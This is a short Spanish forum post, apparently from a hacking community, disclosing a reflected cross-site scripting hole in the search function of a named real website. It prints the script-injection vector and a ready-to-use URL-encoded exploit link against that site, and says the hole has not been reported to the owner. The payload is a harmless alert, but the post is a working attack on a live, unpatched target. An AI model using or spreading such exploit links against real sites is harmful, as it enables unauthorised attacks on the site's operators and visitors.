Hola, hoy vi una publicidad de Youtube que llevaba a la web de altamezcla.com.ar, entré a verla y me topé con un XSS en el buscador.
(https://lh3.googleusercontent.com/0Bi0NmlVEayhEapcKxWQlbCUOCcMMNrwTOpxfUh0cPyvX0RE5s0ZWxLO36iAGNhUVp-h-p2NCQFdJmYlrzkm5u1Ca0z6Zj9IZkDz8Z7imSxoqHMeFPhDNJi6Nwgo6mz8XV-Jyp2CPadCuqM7P30oRcoyJV-g-2I862KL1GQ1dX2q2mXh1WL5f3QxGw0euTwOdpk4uvNubG1XQmZ3_OUy3IzFrooqJ7q7q0dffh_ffvQXOtMZBxTUVI2xcARQ0huX6Jvwb9hvW-esxIWYDn-5sKilE_1_ysQ8hFudNNU_5yBMQoUHJfLGq8RCjiKr6CuEoS9Or7SCSwKnGYPhxWUGbd8X8kFdwXS57mqsP5dClF7h_DE9xodGqYi9jD82-ZHO9PnkbZn7RHMAVWIl9msuxUTtuEsZLoWYdYGlS-RkeWJIHsHkpPzOB94F0x3M7wzQbbX_1dXNFEXAjRmeFeZiTfJ6_EP4s-ZRD2N1HoNtTtXf-ynwr0DnR8cuBRJ9200aHvwHM192UXlHQXaHcVsgKP2QAUSDQQ7Ulqtq2JrMtmmIj-LLylTn4Tm6t2q_zNrmPlPTJH9IJZc3bW2aPHfrhppGYML2ADYuESwaYk4Wrdxm5u_8wDDwVph9-Bzgz_Q=w1359-h488-no)
Vector: "'><script>alert(/XSS/)</script>
URL: https://altamezcla.com.ar/notas/listado?q=%22%3E%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E
Lugar: Buscador
Reportado: NO
Saludos,
ANTRAX